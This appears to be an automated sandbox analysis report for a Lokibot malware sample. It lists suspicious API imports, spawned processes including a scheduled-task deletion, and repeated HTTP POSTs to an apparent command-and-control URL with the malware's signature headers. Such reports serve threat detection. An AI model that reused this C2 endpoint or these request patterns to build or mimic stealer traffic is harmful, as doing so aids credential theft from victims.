rpcrt4.dll.RpcBindingSetOption
ole32.dll.CoCreateFreeThreadedMarshaler
ole32.dll.CreateStreamOnHGlobal
kernelbase.dll.InitializeAcl
kernelbase.dll.AddAce
kernel32.dll.OpenProcessToken
kernelbase.dll.GetTokenInformation
kernelbase.dll.DuplicateTokenEx
kernelbase.dll.AdjustTokenPrivileges
kernelbase.dll.AllocateAndInitializeSid
kernelbase.dll.CheckTokenMembership
kernel32.dll.SetThreadToken
advapi32.dll.RegOpenKeyW
ole32.dll.CLSIDFromString
authz.dll.AuthzInitializeContextFromSid
ole32.dll.CoGetCallContext
ole32.dll.StringFromGUID2
ole32.dll.CoImpersonateClient
ole32.dll.CoRevertToSelf
ole32.dll.CoSwitchCallContext
oleaut32.dll.#500
oleaut32.dll.#8

Execute Commands

"C:\Users\Seven01\AppData\Local\Temp\TRIP2323232.exe"
C:\Windows\system32\lsass.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
C:\Windows\system32\sc.exe start w32time task_started
C:\Windows\system32\rundll32.exe dfdts.dll,DfdGetDefaultPolicyAndSMART
C:\Windows\System32\wsqmcons.exe
C:\Windows\system32\svchost.exe -k netsvcs
C:\Windows\system32\schtasks.exe /delete /f /TN "Microsoft\Windows\Customer Experience Improvement Program\Uploader"
\\?\C:\Windows\system32\wbem\WMIADAP.EXE wmiadap.exe /F /T /R
C:\Windows\system32\wbem\wmiprvse.exe -Embedding

Started Services

VaultSvc
W32Time

Created Services

Nothing to display
Behavior analysis details
Machine name Machine label Machine manager Started Ended Duration
Seven04_64 Seven04_64 VirtualBox 2018-09-09 19:20:30 2018-09-09 19:24:18 228

2 HTTP Request(s) detected

http://blackdiamondsco.ae/trip/fre.php
  • Hostname: blackdiamondsco.ae
  • IP Address:
  • Port: 80
  • Count: 2

POST /trip/fre.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: blackdiamondsco.ae
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: 61B967EE
Content-Length: 192
Connection: close

http://blackdiamondsco.ae/trip/fre.php
  • Hostname: blackdiamondsco.ae
  • IP Address:
  • Port: 80
  • Count: 15

POST /trip/fre.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: blackdiamondsco.ae
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: 61B967EE
Content-Length: 165
Connection: close

#infosec #automation

TheSystem Itself @ 2018-09-09 19:24:21

Detected family: #Lokibot

TheSystem Itself @ 2018-09-09 20:06:04